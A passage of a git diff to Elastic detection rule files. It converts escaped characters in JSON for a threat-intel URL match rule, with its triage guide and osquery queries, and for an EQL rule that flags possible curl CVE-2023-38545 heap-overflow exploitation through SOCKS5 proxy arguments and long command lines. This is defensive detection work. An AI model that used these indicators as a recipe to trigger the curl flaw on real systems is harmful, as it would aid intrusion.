components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\nThis rule needs threat intelligence indicators to work. Threat intelligence indicators can be collected using an [Elastic Agent integration](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html#agent-ti-integration), the [Threat Intel module](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html#ti-mod-integration), or a [custom integration](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html#custom-ti-integration).\n\nMore information can be found [here](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html).", + "note": "## Triage and Analysis\n\n### Investigating Threat Intel URL Indicator Match\n\nThreat Intel indicator match rules allow matching from a local observation, such as an endpoint event that records a file hash with an entry of a file hash stored within the Threat Intel integrations index. \n\nMatches are based on threat intelligence data that's been ingested during the last 30 days. Some integrations don't place expiration dates on their threat indicators, so we strongly recommend validating ingested threat indicators and reviewing match results. When reviewing match results, check associated activity to determine whether the event requires additional investigation.\n\nThis rule is triggered when a URL indicator from the Threat Intel Filebeat module or a threat intelligence integration matches against an event that contains URL data, like DNS events, network logs, etc.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the URL, which can be found in the `threat.indicator.matched.atomic` field:\n - Identify the type of malicious activity related to the URL (phishing, malware, etc.).\n - Check the reputation of the IP address in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc. \n - Execute a WHOIS lookup to retrieve information about the domain registration and contacts to report abuse.\n - If dealing with a phishing incident:\n - Contact the user to gain more information around the delivery method, information sent, etc.\n - Analyze whether the URL is trying to impersonate a legitimate address. Look for typosquatting, extra or unusual subdomains, or other anomalies that could lure the user.\n - Investigate the phishing page to identify which information may have been sent to the attacker by the user.\n- Identify the process responsible for the connection, and investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Retrieve the involved process executable and examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n- Using the data collected through the analysis, scope users targeted and other machines infected in the environment.\n\n### False Positive Analysis\n\n- False positives might occur after large and publicly written campaigns if curious employees interact with attacker infrastructure.\n- Some feeds may include internal or known benign addresses by mistake (e.g., 8.8.8.8, google.com, 127.0.0.1, etc.). Make sure you understand how blocking a specific domain or address might impact the organization or normal system functioning.\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Consider reporting the address for abuse using the provided contact information.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\nThis rule needs threat intelligence indicators to work. Threat intelligence indicators can be collected using an [Elastic Agent integration](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html#agent-ti-integration), the [Threat Intel module](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html#ti-mod-integration), or a [custom integration](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html#custom-ti-integration).\n\nMore information can be found [here](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html).", "query": "url.full:*\n", "references": [ "https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-threatintel.html", @@ -125,7 +125,7 @@ ] } ], - "threat_query": "@timestamp \u003e= \"now-30d/d\" and event.module:(threatintel or ti_*) and threat.indicator.url.full:* and not labels.is_ioc_transform_source:\"true\"", + "threat_query": "@timestamp >= \"now-30d/d\" and event.module:(threatintel or ti_*) and threat.indicator.url.full:* and not labels.is_ioc_transform_source:\"true\"", "timeline_id": "495ad7a7-316e-4544-8a0f-9c098daee76e", "timeline_title": "Generic Threat Match Timeline", "type": "threat_match", diff --git a/packages/security_detection_engine/kibana/security_rule/f3e22c8b-ea47-45d1-b502-b57b6de950b3_4.json b/packages/security_detection_engine/kibana/security_rule/f3e22c8b-ea47-45d1-b502-b57b6de950b3_4.json index 97db950c85b..ae23b5875b1 100644 --- a/packages/security_detection_engine/kibana/security_rule/f3e22c8b-ea47-45d1-b502-b57b6de950b3_4.json +++ b/packages/security_detection_engine/kibana/security_rule/f3e22c8b-ea47-45d1-b502-b57b6de950b3_4.json @@ -17,7 +17,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "Threat Intel URL Indicator Match", - "note": "## Triage and Analysis\n\n### Investigating Threat Intel URL Indicator Match\n\nThreat Intel indicator match rules allow matching from a local observation, such as an endpoint event that records a file hash with an entry of a file hash stored within the Threat Intel integrations index. \n\nMatches are based on threat intelligence data that's been ingested during the last 30 days. Some integrations don't place expiration dates on their threat indicators, so we strongly recommend validating ingested threat indicators and reviewing match results. When reviewing match results, check associated activity to determine whether the event requires additional investigation.\n\nThis rule is triggered when a URL indicator from the Threat Intel Filebeat module or a threat intelligence integration matches against an event that contains URL data, like DNS events, network logs, etc.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the URL, which can be found in the `threat.indicator.matched.atomic` field:\n - Identify the type of malicious activity related to the URL (phishing, malware, etc.).\n - Check the reputation of the IP address in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc. \n - Execute a WHOIS lookup to retrieve information about the domain registration and contacts to report abuse.\n - If dealing with a phishing incident:\n - Contact the user to gain more information around the delivery method, information sent, etc.\n - Analyze whether the URL is trying to impersonate a legitimate address. Look for typosquatting, extra or unusual subdomains, or other anomalies that could lure the user.\n - Investigate the phishing page to identify which information may have been sent to the attacker by the user.\n- Identify the process responsible for the connection, and investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Retrieve the involved process executable and examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n- Using the data collected through the analysis, scope users targeted and other machines infected in the environment.\n\n### False Positive Analysis\n\n- False positives might occur after large and publicly written campaigns if curious employees interact with attacker infrastructure.\n- Some feeds may include internal or known benign addresses by mistake (e.g., 8.8.8.8, google.com, 127.0.0.1, etc.). Make sure you understand how blocking a specific domain or address might impact the organization or normal system functioning.\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Consider reporting the address for abuse using the provided contact information.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", + "note": "## Triage and Analysis\n\n### Investigating Threat Intel URL Indicator Match\n\nThreat Intel indicator match rules allow matching from a local observation, such as an endpoint event that records a file hash with an entry of a file hash stored within the Threat Intel integrations index. \n\nMatches are based on threat intelligence data that's been ingested during the last 30 days. Some integrations don't place expiration dates on their threat indicators, so we strongly recommend validating ingested threat indicators and reviewing match results. When reviewing match results, check associated activity to determine whether the event requires additional investigation.\n\nThis rule is triggered when a URL indicator from the Threat Intel Filebeat module or a threat intelligence integration matches against an event that contains URL data, like DNS events, network logs, etc.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the URL, which can be found in the `threat.indicator.matched.atomic` field:\n - Identify the type of malicious activity related to the URL (phishing, malware, etc.).\n - Check the reputation of the IP address in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc. \n - Execute a WHOIS lookup to retrieve information about the domain registration and contacts to report abuse.\n - If dealing with a phishing incident:\n - Contact the user to gain more information around the delivery method, information sent, etc.\n - Analyze whether the URL is trying to impersonate a legitimate address. Look for typosquatting, extra or unusual subdomains, or other anomalies that could lure the user.\n - Investigate the phishing page to identify which information may have been sent to the attacker by the user.\n- Identify the process responsible for the connection, and investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Retrieve the involved process executable and examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n- Using the data collected through the analysis, scope users targeted and other machines infected in the environment.\n\n### False Positive Analysis\n\n- False positives might occur after large and publicly written campaigns if curious employees interact with attacker infrastructure.\n- Some feeds may include internal or known benign addresses by mistake (e.g., 8.8.8.8, google.com, 127.0.0.1, etc.). Make sure you understand how blocking a specific domain or address might impact the organization or normal system functioning.\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Consider reporting the address for abuse using the provided contact information.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", "query": "url.full:*\n", "references": [ "https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-threatintel.html", @@ -125,7 +125,7 @@ ] } ], - "threat_query": "@timestamp \u003e= \"now-30d/d\" and event.module:(threatintel or ti_*) and threat.indicator.url.full:* and not labels.is_ioc_transform_source:\"true\"", + "threat_query": "@timestamp >= \"now-30d/d\" and event.module:(threatintel or ti_*) and threat.indicator.url.full:* and not labels.is_ioc_transform_source:\"true\"", "timeline_id": "495ad7a7-316e-4544-8a0f-9c098daee76e", "timeline_title": "Generic Threat Match Timeline", "type": "threat_match", diff --git a/packages/security_detection_engine/kibana/security_rule/f41296b4-9975-44d6-9486-514c6f635b2d_1.json b/packages/security_detection_engine/kibana/security_rule/f41296b4-9975-44d6-9486-514c6f635b2d_1.json index d0546dd04b9..1c475f65934 100644 --- a/packages/security_detection_engine/kibana/security_rule/f41296b4-9975-44d6-9486-514c6f635b2d_1.json +++ b/packages/security_detection_engine/kibana/security_rule/f41296b4-9975-44d6-9486-514c6f635b2d_1.json @@ -3,7 +3,7 @@ "author": [ "Elastic" ], - "description": "Detects potential exploitation of curl CVE-2023-38545 by monitoring for vulnerable command line arguments in conjunction with an unusual command line length. A flaw in curl version \u003c= 8.3 makes curl vulnerable to a heap based buffer overflow during the SOCKS5 proxy handshake. Upgrade to curl version \u003e= 8.4 to patch this vulnerability. This exploit can be executed with and without the use of environment variables. For increased visibility, enable the collection of http_proxy, HTTPS_PROXY and ALL_PROXY environment variables based on the instructions provided in the setup guide of this rule.", + "description": "Detects potential exploitation of curl CVE-2023-38545 by monitoring for vulnerable command line arguments in conjunction with an unusual command line length. A flaw in curl version <= 8.3 makes curl vulnerable to a heap based buffer overflow during the SOCKS5 proxy handshake. Upgrade to curl version >= 8.4 to patch this vulnerability. This exploit can be executed with and without the use of environment variables. For increased visibility, enable the collection of http_proxy, HTTPS_PROXY and ALL_PROXY environment variables based on the instructions provided in the setup guide of this rule.", "from": "now-9m", "index": [ "logs-endpoint.events.*" @@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential curl CVE-2023-38545 Exploitation", - "query": "process where host.os.type == \"linux\" and event.action == \"exec\" and event.type == \"start\" and process.name == \"curl\" \nand (\n process.args : (\"--socks5-hostname\", \"--proxy\", \"--preproxy\", \"socks5*\") or \n process.env_vars: (\"http_proxy=socks5h://*\", \"HTTPS_PROXY=socks5h://*\", \"ALL_PROXY=socks5h://*\")\n) and length(process.command_line) \u003e 255\n", + "query": "process where host.os.type == \"linux\" and event.action == \"exec\" and event.type == \"start\" and process.name == \"curl\" \nand (\n process.args : (\"--socks5-hostname\", \"--proxy\", \"--preproxy\", \"socks5*\") or \n process.env_vars: (\"http_proxy=socks5h://*\", \"HTTPS_PROXY=socks5h://*\", \"ALL_PROXY=socks5h://*\")\n) and length(process.command_line) > 255\n", "references": [ "https://curl.se/docs/CVE-2023-38545.html", "https://daniel.haxx.se/blog/2023/10/11/curl-8-4-0/", @@ -74,7 +74,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/f41296b4-9975-44d6-9486-514c6f635b2d_2.json b/packages/security_detection_engine/kibana/security_rule/f41296b4-9975-44d6-9486-514c6f635b2d_2.json index 93313420772..76113abda20 100644 --- a/packages/security_detection_engine/kibana/security_rule/f41296b4-9975-44d6-9486-514c6f635b2d_2.json +++ b/packages/security_detection_engine/kibana/security_rule/f41296b4-9975-44d6-9486-514c6f635b2d_2.json @@ -3,7 +3,7 @@ "author": [ "Elastic" ], - "description": "Detects potential exploitation of curl CVE-2023-38545 by monitoring for vulnerable command line arguments in conjunction with an unusual command line length. A flaw in curl version \u003c= 8.3 makes curl vulnerable to a heap based buffer overflow during the SOCKS5 proxy handshake. Upgrade to curl version \u003e= 8.4 to patch this vulnerability. This exploit can be executed with and without the use of environment variables. For increased visibility, enable the collection of http_proxy, HTTPS_PROXY and ALL_PROXY environment variables based on the instructions provided in the setup guide of this rule.", + "description": "Detects potential exploitation of curl CVE-2023-38545 by monitoring for vulnerable command line arguments in conjunction with an unusual command line length. A flaw in curl version <= 8.3 makes curl vulnerable to a heap based buffer overflow during the SOCKS5 proxy handshake. Upgrade to curl version >= 8.4 to patch this vulnerability. This exploit can be executed with and without the use of environment variables. For increased visibility, enable the collection of http_proxy, HTTPS_PROXY and ALL_PROXY environment variables based on the instructions provided in the setup guide of this rule.", "from": "now-9m", "index": [ "logs-endpoint.events.*" @@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential curl CVE-2023-38545 Exploitation", - "query": "process where host.os.type == \"linux\" and event.action == \"exec\" and event.type == \"start\" and process.name == \"curl\" \nand (\n process.args : (\"--socks5-hostname\", \"--proxy\", \"--preproxy\", \"socks5*\") or \n process.env_vars: (\"http_proxy=socks5h://*\", \"HTTPS_PROXY=socks5h://*\", \"ALL_PROXY=socks5h://*\")\n) and length(process.command_line) \u003e 255\n", + "query": "process where host.os.type == \"linux\" and event.action == \"exec\" and event.type == \"start\" and process.name == \"curl\" \nand (\n process.args : (\"--socks5-hostname\", \"--proxy\", \"--preproxy\", \"socks5*\") or \n process.env_vars: (\"http_proxy=socks5h://*\", \"HTTPS_PROXY=socks5h://*\", \"ALL_PROXY=socks5h://*\")\n) and length(process.command_line) > 255\n", "references": [ "https://curl.se/docs/CVE-2023-38545.html", "https://daniel.haxx.se/blog/2023/10/11/curl-8-4-0/", @@ -74,7 +74,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/f41296b4-9975-44d6-9486-514c6f635b2d_3.json b/packages/security_detection_engine/kibana/security_rule/f41296b4-9975-44d6-9486-514c6f635b2d_3.json index 5804240c2bd..bdb61863416 100644 --- a/packages/security_detection_engine/kibana/security_rule/f41296b4-9975-44d6-9486-514c6f635b2d_3.json +++ b/packages/security_detection_engine/kibana/security_rule/f41296b4-9975-44d6-9486-514c6f635b2d_3.json @@ -3,7 +3,7 @@ "author": [ "Elastic" ], - "description": "Detects potential exploitation of curl CVE-2023-38545 by monitoring for vulnerable command line arguments in conjunction with an unusual command line length. A flaw in curl version \u003c= 8.3 makes curl vulnerable to a heap based buffer overflow during the SOCKS5 proxy handshake. Upgrade to curl version \u003e= 8.4 to patch this vulnerability. This exploit can be executed with and without the use of environment variables. For increased visibility, enable the collection of http_proxy, HTTPS_PROXY and ALL_PROXY environment variables based on the instructions provided in the setup guide of this rule.", + "description": "Detects potential exploitation of curl CVE-2023-38545 by monitoring for vulnerable command line arguments in conjunction with an unusual command line length. A flaw in curl version <= 8.3 makes curl vulnerable to a heap based buffer overflow during the SOCKS5 proxy handshake. Upgrade to curl version >= 8.4 to patch this vulnerability. This exploit can be executed with and without the use of environment variables. For increased visibility, enable the collection of http_proxy, HTTPS_PROXY and ALL_PROXY environment variables based on the instructions provided in the setup guide of this rule.", "from": "now-9m", "index": [ "logs-endpoint.events.*" @@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential curl CVE-2023-38545 Exploitation", - "query": "process where host.os.type == \"linux\" and event.action == \"exec\" and event.type == \"start\" and process.name == \"curl\" \nand (\n process.args : (\"--socks5-hostname\", \"--proxy\", \"--preproxy\", \"socks5*\") or \n process.env_vars: (\"http_proxy=socks5h://*\", \"HTTPS_PROXY=socks5h://*\", \"ALL_PROXY=socks5h://*\")\n) and length(process.command_line) \u003e 255\n", + "query": "process where host.os.type == \"linux\" and event.action == \"exec\" and event.type == \"start\" and process.name == \"curl\" \nand (\n process.args : (\"--socks5-hostname\", \"--proxy\", \"--preproxy\", \"socks5*\") or \n process.env_vars: (\"http_proxy=socks5h://*\", \"HTTPS_PROXY=socks5h://*\", \"ALL_PROXY=socks5h://*\")\n) and length(process.command_line) > 255\n", "references": [ "https://curl.se/docs/CVE-2023-38545.html", "https://daniel.haxx.se/blog/2023/10/11/curl-8-4-0/", @@ -74,7 +74,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/f44fa4b6-524c-4e87-8d9e-a32599e4fb7c_102.json b/packages/security_detection_engine/kibana/security_rule/f44fa4b6-524c-4e87-8d9e-a32599e4fb7c_102.json index 22fd9d6c64e..5100a0904ea 100644 --- a/packages/security_detection_engine/kibana/security_rule/f44fa4b6-524c-4e87-8d9e-a32599e4fb7c_102.json +++ b/packages/security_detection_engine/kibana/security_rule/f44fa4b6-524c-4e87-8d9e-a32599e4fb7c_102.json @@ -53,7 +53,7 @@ ], "risk_score": 73, "rule_id": "f44fa4b6-524c-4e87-8d9e-a32599e4fb7c", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/f44fa4b6-524c-4e87-8d9e-a32599e4fb7c_103.json b/packages/security_detection_engine/kibana/security_rule/f44fa4b6-524c-4e87-8d9e-a32599e4fb7c_103.json index 82b7709e673..0a70e5bb7b7 100644 --- a/packages/security_detection_engine/kibana/security_rule/f44fa4b6-524c-4e87-8d9e-a32599e4fb7c_103.json +++ b/packages/security_detection_engine/kibana/security_rule/f44fa4b6-524c-4e87-8d9e-a32599e4fb7c_103.json @@ -53,7 +53,7 @@ ], "risk_score": 73, "rule_id": "f44fa4b6-524c-4e87-8d9e-a32599e4fb7c", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/f44fa4b6-524c-4e87-8d9e-a32599e4fb7c_104.json b/packages/security_detection_engine/kibana/security_rule/f44fa4b6-524c-4e87-8d9e-a32599e4fb7c_104.json index e3c5fdb6673..1fcc0d9b849 100644 --- a/packages/security_detection_engine/kibana/security_rule/f44fa4b6-524c-4e87-8d9e-a32599e4fb7c_104.json +++ b/packages/security_detection_engine/kibana/security_rule/f44fa4b6-524c-4e87-8d9e-a32599e4fb7c_104.json @@ -53,7 +53,7 @@ ], "risk_score": 73, "rule_id": "f44fa4b6-524c-4e87-8d9e-a32599e4fb7c", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/f44fa4b6-524c-4e87-8d9e-a32599e4fb7c_105.json b/packages/security_detection_engine/kibana/security_rule/f44fa4b6-524c-4e87-8d9e-a32599e4fb7c_105.json index 776d2f2a9c7..2f99164ad0b 100644 --- a/packages/security_detection_engine/kibana/security_rule/f44fa4b6-524c-4e87-8d9e-a32599e4fb7c_105.json +++ b/packages/security_detection_engine/kibana/security_rule/f44fa4b6-524c-4e87-8d9e-a32599e4fb7c_105.json @@ -53,7 +53,7 @@ ], "risk_score": 73, "rule_id": "f44fa4b6-524c-4e87-8d9e-a32599e4fb7c", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/f44fa4b6-524c-4e87-8d9e-a32599e4fb7c_106.json b/packages/security_detection_engine/kibana/security_rule/f44fa4b6-524c-4e87-8d9e-a32599e4fb7c_106.json index 8a42f6d9b8b..5c0831a2fb3 100644 --- a/packages/security_detection_engine/kibana/security_rule/f44fa4b6-524c-4e87-8d9e-a32599e4fb7c_106.json +++ b/packages/security_detection_engine/kibana/security_rule/f44fa4b6-524c-4e87-8d9e-a32599e4fb7c_106.json @@ -52,7 +52,7 @@ ], "risk_score": 73, "rule_id": "f44fa4b6-524c-4e87-8d9e-a32599e4fb7c", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "high", "tags": [ "Domain: Endpoint", @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/f494c678-3c33-43aa-b169-bb3d5198c41d_105.json 